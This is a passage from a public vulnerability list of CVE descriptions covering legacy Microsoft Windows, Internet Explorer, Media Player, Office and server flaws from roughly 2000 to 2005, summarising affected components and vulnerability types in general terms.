crafted message. [CVE-2005-0048] Microsoft Windows XP SP2 and earlier, 2000 SP3 and SP4, Server 2003, and older operating systems allows remote attackers to cause a denial of service and possibly execute arbitrary code via crafted IP packets with malformed options, aka the "IP Validation Vulnerability." [CVE-2004-2527] The local and remote desktop login screens in Microsoft Windows XP before SP2 and 2003 allow remote attackers to cause a denial of service (CPU and memory consumption) by repeatedly using the WinKey+"U" key combination, which causes multiple copies of Windows Utility Manager to be loaded more quickly than they can be closed when the copies detect that another instance is running. [CVE-2004-2454] aMSN 0.90 for Microsoft Windows allows local users to obtain sensitive information such as hashed passwords from (1) hotlog.htm and (2) config.xml. [CVE-2004-2365] Memory leak in Microsoft Windows XP and Windows Server 2003 allows local users to cause a denial of service (memory exhaustion) by repeatedly creating and deleting directories using a non-standard tool such as smbmount. [CVE-2004-2339] DISPUTED Microsoft Windows 2000, XP, and possibly 2003 allows local users with the SeDebugPrivilege privilege to execute arbitrary code as kernel and read or write kernel memory via the NtSystemDebugControl function, which does not verify its pointer arguments. Note: this issue has been disputed, since Administrator privileges are typically required to exploit this issue, thus privilege boundaries are not crossed. [CVE-2004-2307] Microsoft Internet Explorer 6.0.2600 on Windows XP allows remote attackers to cause a denial of service (browser crash) via a shell: URI with double backslashes (\\) in an HTML tag such as IFRAME or A. [CVE-2004-2291] Microsoft Windows Internet Explorer 5.5 and 6.0 allows remote attackers to execute arbitrary code via an embedded script that uses Shell Helper objects and a shortcut (link) to execute the target script. [CVE-2004-2290] Microsoft Windows XP Explorer allows attackers to execute arbitrary code via a HTML and script in a self-executing folder that references an executable file within the folder, which is automatically executed when a user accesses the folder. [CVE-2004-2289] Microsoft Windows XP Explorer allows local users to execute arbitrary code via a system folder with a Desktop.ini file containing a .ShellClassInfo specifier with a CLSID value that is associated with an executable file. [CVE-2004-2176] The Internet Connection Firewall (ICF) in Microsoft Windows XP SP2 is configured by default to trust sessmgr.exe, which allows local users to use sessmgr.exe to create a local listening port that bypasses the ICF access controls. [CVE-2004-1889] Unknown vulnerability in ftpd in SGI IRIX 6.5.20 through 6.5.23 allows remote attackers to cause a denial of service (hang) via a link failure with Microsoft Windows. [CVE-2004-1325] The getItemInfoByAtom function in the ActiveX control for Microsoft Windows Media Player 9.0 returns a 0 if the file does not exist and the size of the file if the file exists, which allows remote attackers to determine the existence of files on the local system. [CVE-2004-1324] The Microsoft Windows Media Player 9.0 ActiveX control may allow remote attackers to execute arbitrary web script in the Local computer zone via the (1) artist or (2) song fields of a music file, if the file is processed using Internet Explorer. [CVE-2004-1080] The WINS service (wins.exe) on Microsoft Windows NT Server 4.0, Windows 2000 Server, and Windows Server 2003 allows remote attackers to write to arbitrary memory locations and possibly execute arbitrary code via a modified memory pointer in a WINS replication packet to TCP port 42, aka the "Association Context Vulnerability." [CVE-2004-1049] Integer overflow in the LoadImage API of the USER32 Lib for Microsoft Windows allows remote attackers to execute arbitrary code via a .bmp, .cur, .ico or .ani file with a large image size field, which leads to a buffer overflow, aka the "Cursor and Icon Format Handling Vulnerability." [CVE-2004-0901] Microsoft Word for Windows 6.0 Converter (MSWRD632.WPC), as used in WordPad, does not properly validate certain data lengths, which allows remote attackers to execute arbitrary code via a .wri, .rtf, and .doc file sent by email or malicious web site, aka "Font Conversion Vulnerability," a different vulnerability than CVE-2004-0571. [CVE-2004-0900] The DHCP Server service for Microsoft Windows NT 4.0 Server and Terminal Server Edition does not properly validate the length of certain messages, which allows remote attackers to execute arbitrary code via a malformed DHCP message, aka the "DHCP Request Vulnerability." [CVE-2004-0899] The DHCP Server service for Microsoft Windows NT 4.0 Server and Terminal Server Edition, with DHCP logging enabled, does not properly validate the length of certain messages, which allows remote attackers to cause a denial of service (application crash) via a malformed DHCP message, aka "Logging Vulnerability." [CVE-2004-0897] The Indexing Service for Microsoft Windows XP and Server 2003 does not properly validate the length of a message, which allows remote attackers to execute arbitrary code via a buffer overflow attack. [CVE-2004-0840] The SMTP (Simple Mail Transfer Protocol) component of Microsoft Windows XP 64-bit Edition, Windows Server 2003, Windows Server 2003 64-bit Edition, and the Exchange Routing Engine component of Exchange Server 2003, allows remote attackers to execute arbitrary code via a malicious DNS response message containing length values that are not properly validated. [CVE-2004-0727] Microsoft Internet Explorer 6.0.2800.1106 on Microsoft Windows XP SP2, and other versions including 5.01 and 5.5, allows remote web servers to bypass zone restrictions and execute arbitrary code in the local computer zone by redirecting a function to another function with the same name, as demonstrated by SimilarMethodNameRedir, aka the "Similar Method Name Redirection Cross Domain Vulnerability." [CVE-2004-0726] The Windows Media Player control in Microsoft Windows 2000 allows remote attackers to execute arbitrary script in the local computer zone via an ASX filename that contains javascript, which is executed in the local context in a preview panel. [CVE-2004-0575] Integer overflow in DUNZIP32.DLL for Microsoft Windows XP, Windows XP 64-bit Edition, Windows Server 2003, and Windows Server 2003 64-bit Edition allows remote attackers to execute arbitrary code via compressed (zipped) folders that involve an "unchecked buffer" and improper length validation. [CVE-2004-0574] The Network News Transfer Protocol (NNTP) component of Microsoft Windows NT Server 4.0, Windows 2000 Server, Windows Server 2003, Exchange 2000 Server, and Exchange Server 2003 allows remote attackers to execute arbitrary code via XPAT patterns, possibly related to improper length validation and an "unchecked buffer," leading to off-by-one and heap-based buffer overflows. [CVE-2004-0571] Microsoft Word for Windows 6.0 Converter does not properly validate certain data lengths, which allows remote attackers to execute arbitrary code via a .wri, .rtf, and .doc file sent by email or malicious web site, aka "Table Conversion Vulnerability," a different vulnerability than CVE-2004-0901. [CVE-2004-0569] The RPC Runtime Library for Microsoft Windows NT 4.0 allows remote attackers to read active memory or cause a denial of service (system crash) via a malicious message, possibly related to improper length values. [CVE-2004-0540] Microsoft Windows 2000, when running in a domain whose Fully Qualified Domain Name (FQDN) is exactly 8 characters long, does not prevent users with expired passwords from logging on to the domain. [CVE-2004-0503] Microsoft Outlook 2003 allows remote attackers to bypass the default zone restrictions and execute script within media files via a Rich Text Format (RTF) message containing an OLE object for the Windows Media Player, which bypasses Media Player's setting to disallow scripting and may lead to unprompted installation of an executable when exploited in conjunction with predictable-file-location exposures such as CVE-2004-0502. [CVE-2004-0214] Buffer overflow in Microsoft Internet Explorer and Explorer on Windows XP SP1, WIndows 2000, Windows 98, and Windows Me may allow remote malicious servers to cause a denial of service (application crash) and possibly execute arbitrary code via long share names, as demonstrated using Samba. [CVE-2004-0211] The kernel for Microsoft Windows Server 2003 does not reset certain values in CPU data structures, which allows local users to cause a denial of service (system crash) via a malicious program. [CVE-2004-0210] The POSIX component of Microsoft Windows NT and Windows 2000 allows local users to execute arbitrary code via certain parameters, possibly by modifying message length values and causing a buffer overflow. [CVE-2004-0209] Unknown vulnerability in the Graphics Rendering Engine processes of Microsoft Windows 2000, Windows XP, and Windows Server 2003 allows remote attackers to execute arbitrary code via (1) Windows Metafile (WMF) or (2) Enhanced Metafile (EMF) image formats that involve "an unchecked buffer." [CVE-2004-0208] The Virtual DOS Machine (VDM) subsystem of Microsoft Windows NT 4.0, Windows 2000, Windows XP, and Windows Server 2003 allows local users to access kernel memory and gain privileges via a malicious program that modified some system structures in a way that is not properly validated by privileged operating system functions. [CVE-2004-0207] "Shatter" style vulnerability in the Window Management application programming interface (API) for Microsoft Windows 98, Windows NT 4.0, Windows 2000, Windows XP, and Windows Server 2003 allows local users to gain privileges by using certain API functions to change properties of privileged programs using the SetWindowLong and SetWIndowLongPtr API functions. [CVE-2004-0206] Network Dynamic Data Exchange (NetDDE) services for Microsoft Windows 98, Windows NT 4.0, Windows 2000, Windows XP, and Windows Server 2003 allows attackers to remotely execute arbitrary code or locally gain privileges via a malicious message or application that involves an "unchecked buffer," possibly a buffer overflow. [CVE-2004-0202] IDirectPlay4 Application Programming Interface (API) of Microsoft DirectPlay 7.0a thru 9.0b, as used in Windows Server 2003 and earlier allows remote attackers to cause a denial of service (application crash) via a malformed packet. [CVE-2004-0201] Heap-based buffer overflow in the HtmlHelp program (hh.exe) in HTML Help for Microsoft Windows 98, Me, NT 4.0, 2000, XP, and Server 2003 allows remote attackers to execute arbitrary commands via a .CHM file with a large length field, a different vulnerability than CVE-2003-1041. [CVE-2004-0199] Help and Support Center in Microsoft Windows XP and Windows Server 2003 SP1 does not properly validate HCP URLs, which allows remote attackers to execute arbitrary code, as demonstrated using certain hcp:// URLs that access the DVD Upgrade capability (dvdupgrd.htm). [CVE-2004-0124] The DCOM RPC interface for Microsoft Windows NT 4.0, 2000, XP, and Server 2003 allows remote attackers to cause network communications via an "alter context" call that contains additional data, aka the "Object Identity Vulnerability." [CVE-2004-0120] The Microsoft Secure Sockets Layer (SSL) library, as used in Windows 2000, Windows XP, and Windows Server 2003, allows remote attackers to cause a denial of service via malformed SSL messages. [CVE-2004-0116] An Activation function in the RPCSS Service involved with DCOM activation for Microsoft Windows 2000, XP, and 2003 allows remote attackers to cause a denial of service (memory consumption) via an activation request with a large length field. [CVE-2003-1107] The DHTML capability in Microsoft Windows Media Player (WMP) 6.4, 7.0, 7.1, and 9 may run certain URL commands from a security zone that is less trusted than the current zone, which allows attackers to bypass intended access restrictions. [CVE-2003-1106] The SMTP service in Microsoft Windows 2000 before SP4 allows remote attackers to cause a denial of service (crash or hang) via an e-mail message with a malformed time stamp in the FILETIME attribute. [CVE-2003-0908] The Utility Manager in Microsoft Windows 2000 executes winhlp32.exe with system privileges, which allows local users to execute arbitrary code via a "Shatter" style attack using a Windows message that accesses the context sensitive help button in the GUI, as demonstrated using the File Open dialog in the Help window, a different vulnerability than CVE-2004-0213. [CVE-2003-0907] Help and Support Center in Microsoft Windows XP SP1 does not properly validate HCP URLs, which allows remote attackers to execute arbitrary code via quotation marks in an hcp:// URL, which are not quoted when constructing the argument list to HelpCtr.exe. [CVE-2003-0906] Buffer overflow in the rendering for (1) Windows Metafile (WMF) or (2) Enhanced Metafile (EMF) image formats in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, and XP SP1 allows remote attackers to execute arbitrary code via a malformed WMF or EMF image. [CVE-2003-0839] Directory traversal vulnerability in the "Shell Folders" capability in Microsoft Windows Server 2003 allows remote attackers to read arbitrary files via .. (dot dot) sequences in a "shell:" link. [CVE-2003-0825] The Windows Internet Naming Service (WINS) for Microsoft Windows Server 2003, and possibly Windows NT and Server 2000, does not properly validate the length of certain packets, which allows attackers to cause a denial of service and possibly execute arbitrary code. [CVE-2003-0818] Multiple integer overflows in Microsoft ASN.1 library (MSASN1.DLL), as used in LSASS.EXE, CRYPT32.DLL, and other Microsoft executables and libraries on Windows NT 4.0, 2000, and XP, allow remote attackers to execute arbitrary code via ASN.1 BER encodings with (1) very large length fields that cause arbitrary heap data to be overwritten, or (2) modified bit strings. [CVE-2003-0807] Buffer overflow in the COM Internet Services and in the RPC over HTTP Proxy components for Microsoft Windows NT Server 4.0, NT 4.0 Terminal Server Edition, 2000, XP, and Server 2003 allows remote attackers to cause a denial of service via a crafted request. [CVE-2003-0806] Buffer overflow in the Windows logon process (winlogon) in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, and XP SP1, when a member of a domain, allows remote attackers to execute arbitrary code. [CVE-2003-0719] Buffer overflow in the Private Communications Transport (PCT) protocol implementation in the Microsoft SSL library, as used in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, XP SP1, Server 2003, NetMeeting, Windows 98, and Windows ME, allows remote attackers to execute arbitrary code via PCT 1.0 handshake packets. [CVE-2003-0662] Buffer overflow in Troubleshooter ActiveX Control (Tshoot.ocx) in Microsoft Windows 2000 SP4 and earlier allows remote attackers to execute arbitrary code via an HTML document with a long argument to the RunQuery2 method. [CVE-2003-0660] The Authenticode capability in Microsoft Windows NT through Server 2003 does not prompt the user to download and install ActiveX controls when the system is low on memory, which could allow remote attackers execute arbitrary code without user approval. [CVE-2003-0604] Windows Media Player (WMP) 7 and 8, as running on Internet Explorer and possibly other Microsoft products that process HTML, allows remote attackers to bypass zone restrictions and access or execute arbitrary files via an IFRAME tag pointing to an ASF file whose Content-location contains a File:// URL. [CVE-2003-0533] Stack-based buffer overflow in certain Active Directory service functions in LSASRV.DLL of the Local Security Authority Subsystem Service (LSASS) in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, XP SP1, Server 2003, NetMeeting, Windows 98, and Windows ME, allows remote attackers to execute arbitrary code via a packet that causes the DsRolerUpgradeDownlevelServer function to create long debug entries for the DCPROMO.LOG log file, as exploited by the Sasser worm. [CVE-2003-0496] Microsoft SQL Server before Windows 2000 SP4 allows local users to gain privileges as the SQL Server user by calling the xp_fileexist extended stored procedure with a named pipe as an argument instead of a normal file. [CVE-2003-0352] Buffer overflow in a certain DCOM interface for RPC in Microsoft Windows NT 4.0, 2000, XP, and Server 2003 allows remote attackers to execute arbitrary code via a malformed message, as exploited by the Blaster/MSblast/LovSAN and Nachi/Welchia worms. [CVE-2003-0349] Buffer overflow in the streaming media component for logging multicast requests in the ISAPI for the logging capability of Microsoft Windows Media Services (nsiislog.dll), as installed in IIS 5.0, allows remote attackers to execute arbitrary code via a large POST request to nsiislog.dll. [CVE-2003-0348] A certain Microsoft Windows Media Player 9 Series ActiveX control allows remote attackers to view and manipulate the Media Library on the local system via HTML script. [CVE-2003-0346] Multiple integer overflows in a Microsoft Windows DirectX MIDI library (QUARTZ.DLL) allow remote attackers to execute arbitrary code via a MIDI (.mid) file with (1) large length for a Text or Copyright string, or (2) a large number of tracks, which leads to a heap-based buffer overflow. [CVE-2003-0345] Buffer overflow in the SMB capability for Microsoft Windows XP, 2000, and NT allows remote attackers to cause a denial of service and possibly execute arbitrary code via an SMB packet that specifies a smaller buffer length than is required. [CVE-2003-0228] Directory traversal vulnerability in Microsoft Windows Media Player 7.1 and Windows Media Player for Windows XP allows remote attackers to execute arbitrary code via a skins file with a URL containing hex-encoded backslash characters (%5C) that causes an executable to be placed in an arbitrary location. [CVE-2003-0227] The logging capability for unicast and multicast transmissions in the ISAPI extension for Microsoft Windows Media Services in Microsoft Windows NT 4.0 and 2000, nsiislog.dll, allows remote attackers to cause a denial of service in Internet Information Server (IIS) and execute arbitrary code via a certain network request. [CVE-2003-0111] The ByteCode Verifier component of Microsoft Virtual Machine (VM) build 5.0.3809 and earlier, as used in Windows and Internet Explorer, allows remote attackers to bypass security checks and execute arbitrary code via a malicious Java applet, aka "Flaw in Microsoft VM Could Enable System Compromise." [CVE-2003-0109] Buffer overflow in ntdll.dll on Microsoft Windows NT 4.0, Windows NT 4.0 Terminal Server Edition, Windows 2000, and Windows XP allows remote attackers to execute arbitrary code, as demonstrated via a WebDAV request to IIS 5.0. [CVE-2003-0009] Cross-site scripting (XSS) vulnerability in Help and Support Center for Microsoft Windows Me allows remote attackers to execute arbitrary script in the Local Computer security context via an hcp:// URL with the malicious script in the topic parameter. [CVE-2003-0004] Buffer overflow in the Windows Redirector function in Microsoft Windows XP allows local users to execute arbitrary code via a long parameter. [CVE-2003-0003] Buffer overflow in the RPC Locator service for Microsoft Windows NT 4.0, Windows NT 4.0 Terminal Server Edition, Windows 2000, and Windows XP allows local users to execute arbitrary code via an RPC call to the service containing certain parameter information. [CVE-2002-2283] Microsoft Windows XP with Fast User Switching (FUS) enabled does not remove the "show processes from all users" privilege when the user is removed from the administrator group, which allows that user to view prosesses of other users. [CVE-2002-2117] Microsoft Windows XP allows remote attackers to cause a denial of service (CPU consumption) by flooding UDP port 500 (ISAKMP). [CVE-2002-2105] Microsoft Windows XP allows local users to prevent the system from booting via a corrupt explorer.exe.manifest file. [CVE-2002-2073] Cross-site scripting (XSS) vulnerability in the default ASP pages on Microsoft Site Server 3.0 on Windows NT 4.0 allows remote attackers to inject arbitrary web script or HTML via the (1) ctr parameter in Default.asp and (2) the query string to formslogin.asp. [CVE-2002-1984] Microsoft Internet Explorer 5.0.1 through 6.0 on Windows 2000 or Windows XP allows remote attackers to cause a denial of service (crash) via an OBJECT tag that contains a crafted CLASSID (CLSID) value of "CLSID:00022613-0000-0000-C000-000000000046". [CVE-2002-1933] The terminal services screensaver for Microsoft Windows 2000 does not automatically lock the terminal window if the window is minimized, which could allow local users to gain access to the terminal server window. [CVE-2002-1932] Microsoft Windows XP and Windows 2000, when configured to send administrative alerts and the "Do not overwrite events (clear log manually)" option is set, does not notify the administrator when the log reaches its maximum size, which allows local users and remote attackers to avoid detection. [CVE-2002-1847] Buffer overflow in mplay32.exe of Microsoft Windows Media Player (WMP) 6.3 through 7.1 allows remote attackers to execute arbitrary commands via a long mp3 filename command line argument. NOTE: since the only known attack vector requires command line access, this may not be a vulnerability. [CVE-2002-1844] Microsoft Windows Media Player (WMP) 6.3, when installed on Solaris, installs executables with world-writable permissions, which allows local users to delete or modify the executables to gain privileges. [CVE-2002-1712] Microsoft Windows 2000 allows remote attackers to cause a denial of service (memory consumption) by sending a flood of empty TCP/IP packets with the ACK and FIN bits set to the NetBIOS port (TCP/139), as demonstrated by stream3. [CVE-2002-1692] Buffer overflow in backup utility of Microsoft Windows 95 allows attackers to execute arbitrary code by causing a filename with a long extension to be placed in a folder to be backed up. [CVE-2002-1670] Microsoft Windows XP Professional upgrade edition overwrites previously installed patches for Internet Explorer 6.0, leaving Internet Explorer unpatched. [CVE-2002-1327] Buffer overflow in the Windows Shell function in Microsoft Windows XP allows remote attackers to execute arbitrary code via an .MP3 or .WMA audio file with a corrupt custom attribute, aka "Unchecked Buffer in Windows Shell Could Enable System Compromise." [CVE-2002-1256] The SMB signing capability in the Server Message Block (SMB) protocol in Microsoft Windows 2000 and Windows XP allows attackers to disable the digital signing settings in an SMB session to force the data to be sent unsigned, then inject data into the session without detection, e.g. by modifying group policy information sent from a domain controller. [CVE-2002-1214] Buffer overflow in Microsoft PPTP Service on Windows XP and Windows 2000 allows remote attackers to cause a denial of service (hang) and possibly execute arbitrary code via a certain PPTP packet with malformed control data. [CVE-2002-1184] The system root folder of Microsoft Windows 2000 has default permissions of Everyone group with Full access (Everyone:F) and is in the search path when locating programs during login or application launch from the desktop, which could allow attackers to gain privileges as other users via Trojan horse programs. [CVE-2002-1183] Microsoft Windows 98 and Windows NT 4.0 do not properly verify the Basic Constraints of digital certificates, allowing remote attackers to execute code, aka "New Variant of Certificate Validation Flaw Could Enable Identity Spoofing" (CAN-2002-0862). [CVE-2002-1141] An input validation error in the Sun Microsystems RPC library Services for Unix 3.0 Interix SD, as implemented on Microsoft Windows NT4, 2000, and XP, allows remote attackers to cause a denial of service via malformed fragmented RPC client packets, aka "Denial of service by sending an invalid RPC request." [CVE-2002-1140] The Sun Microsystems RPC library Services for Unix 3.0 Interix SD, as implemented on Microsoft Windows NT4, 2000, and XP, allows remote attackers to cause a denial of service (service hang) via malformed packet fragments, aka "Improper parameter size check leading to denial of service." [CVE-2002-1139] The Compressed Folders feature in Microsoft Windows 98 with Plus! Pack, Windows Me, and Windows XP does not properly check the destination folder during the decompression of ZIP files, which allows attackers to place an executable file in a known location on a user's system, aka "Incorrect Target Path for Zipped File Decompression." [CVE-2002-0864] The Remote Data Protocol (RDP) version 5.1 in Microsoft Windows XP allows remote attackers to cause a denial of service (crash) when Remote Desktop is enabled via a PDU Confirm Active data packet that does not set the Pattern BLT command, aka "Denial of Service in Remote Desktop." [CVE-2002-0863] Remote Data Protocol (RDP) version 5.0 in Microsoft Windows 2000 and RDP 5.1 in Windows XP does not encrypt the checksums of plaintext session data, which could allow a remote attacker to determine the contents of encrypted sessions via sniffing, aka "Weak Encryption in RDP Protocol." [CVE-2002-0862] The (1) CertGetCertificateChain, (2) CertVerifyCertificateChainPolicy, and (3) WinVerifyTrust APIs within the CryptoAPI for Microsoft products including Microsoft Windows 98 through XP, Office for Mac, Internet Explorer for Mac, and Outlook Express for Mac, do not properly verify the Basic Constraints of intermediate CA-signed X.509 certificates, which allows remote attackers to spoof the certificates of trusted sites via a man-in-the-middle attack for SSL sessions, as originally reported for Internet Explorer and IIS. [CVE-2002-0724] Buffer overflow in SMB (Server Message Block) protocol in Microsoft Windows NT, Windows 2000, and Windows XP allows attackers to cause a denial of service (crash) via a SMB_COM_TRANSACTION packet with a request for the (1) NetShareEnum, (2) NetServerEnum2, or (3) NetServerEnum3, aka "Unchecked Buffer in Network Share Provider Can Lead to Denial of Service". [CVE-2002-0699] Unknown vulnerability in the Certificate Enrollment ActiveX Control in Microsoft Windows 98, Windows 98 Second Edition, Windows Millennium, Windows NT 4.0, Windows 2000, and Windows XP allow remote attackers to delete digital certificates on a user's system via HTML. [CVE-2002-0694] The HTML Help facility in Microsoft Windows 98, 98 Second Edition, Millennium Edition, NT 4.0, NT 4.0 Terminal Server Edition, Windows 2000, and Windows XP uses the Local Computer Security Zone when opening .chm files from the Temporary Internet Files folder, which allows remote attackers to execute arbitrary code via HTML mail that references or inserts a malicious .chm file containing shortcuts that can be executed, aka "Code Execution via Compiled HTML Help File." [CVE-2002-0693] Buffer overflow in the HTML Help ActiveX Control (hhctrl.ocx) in Microsoft Windows 98, 98 Second Edition, Millennium Edition, NT 4.0, NT 4.0 Terminal Server Edition, Windows 2000, and Windows XP allows remote attackers to execute code via (1) a long parameter to the Alink function, or (2) script containing a long argument to the showHelp function. [CVE-2002-0619] The Mail Merge Tool in Microsoft Word 2002 for Windows, when Microsoft Access is present on a system, allows remote attackers to execute Visual Basic (VBA) scripts within a mail merge document that is saved in HTML format, aka a "Variant of MS00-071, Word Mail Merge Vulnerability" (CVE-2000-0788). [CVE-2002-0618] The Macro Security Model in Microsoft Excel 2000 and 2002 for Windows allows remote attackers to execute code in the Local Computer zone by embedding HTML scripts within an Excel workbook that contains an XSL stylesheet, aka "Excel XSL Stylesheet Script Execution". [CVE-2002-0617] The Macro Security Model in Microsoft Excel 2000 and 2002 for Windows allows remote attackers to execute code by creating a hyperlink on a drawing shape in a source workbook that points to a destination workbook containing an autoexecute macro, aka "Hyperlinked Excel Workbook Macro Bypass." [CVE-2002-0616] The Macro Security Model in Microsoft Excel 2000 and 2002 for Windows allows remote attackers to execute code by attaching an inline macro to an object within an Excel workbook, aka the "Excel Inline Macros Vulnerability." [CVE-2002-0615] The Windows Media Active Playlist in Microsoft Windows Media Player 7.1 stores information in a well known location on the local file system, allowing attackers to execute HTML scripts in the Local Computer zone, aka "Media Playback Script Invocation". [CVE-2002-0597] LANMAN service on Microsoft Windows 2000 allows remote attackers to cause a denial of service (CPU/memory exhaustion) via a stream of malformed data to microsoft-ds port 445. [CVE-2002-0444] Microsoft Windows 2000 running the Terminal Server 90-day trial version, and possibly other versions, does not apply group policies to incoming users when the number of connections to the SYSVOL share exceeds the maximum, e.g. with a maximum number of licenses, which can allow remote authenticated users to bypass group policies. [CVE-2002-0443] Microsoft Windows 2000 allows local users to bypass the policy that prohibits reusing old passwords by changing the current password before it expires, which does not enable the check for previous passwords. [CVE-2002-0373] The Windows Media Device Manager (WMDM) Service in Microsoft Windows Media Player 7.1 on Windows 2000 systems allows local users to obtain LocalSystem rights via a program that calls the WMDM service to connect to an invalid local storage device, aka "Privilege Elevation through Windows Media Device Manager Service". [CVE-2002-0372] Microsoft Windows Media Player versions 6.4 and 7.1 and Media Player for Windows XP allow remote attackers to bypass Internet Explorer's (IE) security mechanisms and run code via an executable .wma media file with a license installation requirement stored in the IE cache, aka the "Cache Path Disclosure via Windows Media Player". [CVE-2002-0370] Buffer overflow in the ZIP capability for multiple products allows remote attackers to cause a denial of service or execute arbitrary code via ZIP files containing entries with long filenames, including (1) Microsoft Windows 98 with Plus! Pack, (2) Windows XP, (3) Windows ME, (4) Lotus Notes R4 through R6 (pre-gold), (5) Verity KeyView, and (6) Stuffit Expander before 7.0. [CVE-2002-0224] The MSDTC (Microsoft Distributed Transaction Service Coordinator) for Microsoft Windows 2000, Microsoft IIS 5.0 and SQL Server 6.5 through SQL 2000 0.0 allows remote attackers to cause a denial of service (crash or hang) via malformed (random) input. [CVE-2002-0151] Buffer overflow in Multiple UNC Provider (MUP) in Microsoft Windows operating systems allows local users to cause a denial of service or possibly gain SYSTEM privileges via a long UNC request. [CVE-2002-0136] Microsoft Internet Explorer 5.5 on Windows 98 allows remote web pages to cause a denial of service (hang) via extremely long values for form fields such as INPUT and TEXTAREA, which can be automatically filled via Javascript. [CVE-2002-0055] SMTP service in Microsoft Windows 2000, Windows XP Professional, and Exchange 2000 allows remote attackers to cause a denial of service via a command with a malformed data transfer (BDAT) request. [CVE-2002-0054] SMTP service in (1) Microsoft Windows 2000 and (2) Internet Mail Connector (IMC) in Exchange Server 5.5 does not properly handle responses to NTLM authentication, which allows remote attackers to perform mail relaying via an SMTP AUTH command using null session credentials. [CVE-2002-0034] The Microsoft CONVERT.EXE program, when used on Windows 2000 and Windows XP systems, does not apply the default NTFS permissions when converting a FAT32 file system, which could cause the conversion to produce a file system with less secure permissions than expected. [CVE-2002-0018] In Microsoft Windows NT and Windows 2000, a trusting domain that receives authorization information from a trusted domain does not verify that the trusted domain is authoritative for all listed SIDs, which allows remote attackers to gain Domain Administrator privileges on the trusting domain by injecting SIDs from untrusted domains into the authorization data that comes from from the trusted domain. [CVE-2001-1451] Memory leak in the SNMP LAN Manager (LANMAN) MIB extension for Microsoft Windows 2000 before SP3, when the Print Spooler is not running, allows remote attackers to cause a denial of service (memory consumption) via a large number of GET or GETNEXT requests. [CVE-2001-1200] Microsoft Windows XP allows local users to bypass a locked screen and run certain programs that are associated with Hot Keys. [CVE-2001-1055] The Microsoft Windows network stack allows remote attackers to cause a denial of service (CPU consumption) via a flood of malformed ARP request packets with random source IP and MAC addresses, as demonstrated by ARPNuke. [CVE-2001-0909] Buffer overflow in helpctr.exe program in Microsoft Help Center for Windows XP allows remote attackers to execute arbitrary code via a long hcp: URL. [CVE-2001-0719] Buffer overflow in Microsoft Windows Media Player 6.4 allows remote attackers to execute arbitrary code via a malformed Advanced Streaming Format (ASF) file. [CVE-2001-0541] Buffer overflow in Microsoft Windows Media Player 7.1 and earlier allows remote attackers to execute arbitrary commands via a malformed Windows Media Station (.NSC) file. [CVE-2001-0509] Vulnerabilities in RPC servers in (1) Microsoft Exchange Server 2000 and earlier, (2) Microsoft SQL Server 2000 and earlier, (3) Windows NT 4.0, and (4) Windows 2000 allow remote attackers to cause a denial of service via malformed inputs. [CVE-2001-0504] Vulnerability in authentication process for SMTP service in Microsoft Windows 2000 allows remote attackers to use incorrect credentials to gain privileges and conduct activites such as mail relaying. [CVE-2001-0351] Microsoft Windows 2000 telnet service allows a local user to make a certain system call that allows the user to terminate a Telnet session and cause a denial of service. [CVE-2001-0350] Microsoft Windows 2000 telnet service creates named pipes with predictable names and does not properly verify them, which allows local users to execute arbitrary commands by creating a named pipe with the predictable name and associating a malicious program with it, the second of two variants of this vulnerability. [CVE-2001-0349] Microsoft Windows 2000 telnet service creates named pipes with predictable names and does not properly verify them, which allows local users to execute arbitrary commands by creating a named pipe with the predictable name and associating a malicious program with it, the first of two variants of this vulnerability. [CVE-2001-0348] Microsoft Windows 2000 telnet service allows attackers to cause a denial of service (crash) via a long logon command that contains a backspace. [CVE-2001-0347] Information disclosure vulnerability in Microsoft Windows 2000 telnet service allows remote attackers to determine the existence of user accounts such as Guest, or log in to the server without specifying the domain name, via a malformed userid. [CVE-2001-0346] Handle leak in Microsoft Windows 2000 telnet service allows attackers to cause a denial of service by starting a large number of sessions and terminating them. [CVE-2001-0345] Microsoft Windows 2000 telnet service allows attackers to prevent idle Telnet sessions from timing out, causing a denial of service by creating a large number of idle sessions. [CVE-2001-0261] Microsoft Windows 2000 Encrypted File System does not properly destroy backups of files that are encrypted, which allows a local attacker to recover the text of encrypted files. [CVE-2001-0245] Microsoft Index Server 2.0 in Windows NT 4.0, and Indexing Service in Windows 2000, allows remote attackers to read server-side include files via a malformed search request, aka a new variant of the "Malformed Hit-Highlighting" vulnerability. [CVE-2001-0242] Buffer overflows in Microsoft Windows Media Player 7 and earlier allow remote attackers to execute arbitrary commands via (1) a long version tag in an .ASX file, or (2) a long banner tag, a variant of the ".ASX Buffer Overrun" vulnerability as discussed in MS:MS00-090. [CVE-2001-0047] The default permissions for the MTS Package Administration registry key in Windows NT 4.0 allows local users to install or modify arbitrary Microsoft Transaction Server (MTS) packages and gain privileges, aka one of the "Registry Permissions" vulnerabilities. [CVE-2001-0003] Web Extender Client (WEC) in Microsoft Office 2000, Windows 2000, and Windows Me does not properly process Internet Explorer security settings for NTLM authentication, which allows attackers to obtain NTLM credentials and possibly obtain the password, aka the "Web Client NTLM Authentication" vulnerability. [CVE-2000-1218] The default configuration for the domain name resolver for Microsoft Windows 98, NT 4.0, 2000, and XP sets the QueryIpMatching parameter to 0, which causes Windows to accept DNS updates from hosts that it did not query, which allows remote attackers to poison the DNS cache. [CVE-2000-1217] Microsoft Windows 2000 before Service Pack 2 (SP2), when running in a non-Windows 2000 domain and using NTLM authentication, and when credentials of an account are locally cached, allows local users to bypass account lockout policies and make an unlimited number of login attempts, aka the "Domain Account Lockout" vulnerability. [CVE-2000-1113] Buffer overflow in Microsoft Windows Media Player allows remote attackers to execute arbitrary commands via a malformed Active Stream Redirector (.ASX) file, aka the ".ASX Buffer Overrun" vulnerability. [CVE-2000-1112] Microsoft Windows Media Player 7 executes scripts in custom skin (.WMS) files, which could allow remote attackers to gain privileges via a skin that contains a malicious script, aka the ".WMS Script Execution" vulnerability. [CVE-2000-1079] Interactions between the CIFS Browser Protocol and NetBIOS as implemented in Microsoft Windows 95, 98, NT, and 2000 allow remote attackers to modify dynamic NetBIOS name cache entries via a spoofed Browse Frame Request in a unicast or UDP broadcast datagram. [CVE-2000-0942] The CiWebHitsFile component in Microsoft Indexing Services for Windows 2000 allows remote attackers to conduct a cross site scripting (CSS) attack via a CiRestriction parameter in a .htw request, aka the "Indexing Services Cross Site Scripting" vulnerability. [CVE-2000-0929] Microsoft Windows Media Player 7 allows attackers to cause a denial of service in RTF-enabled email clients via an embedded 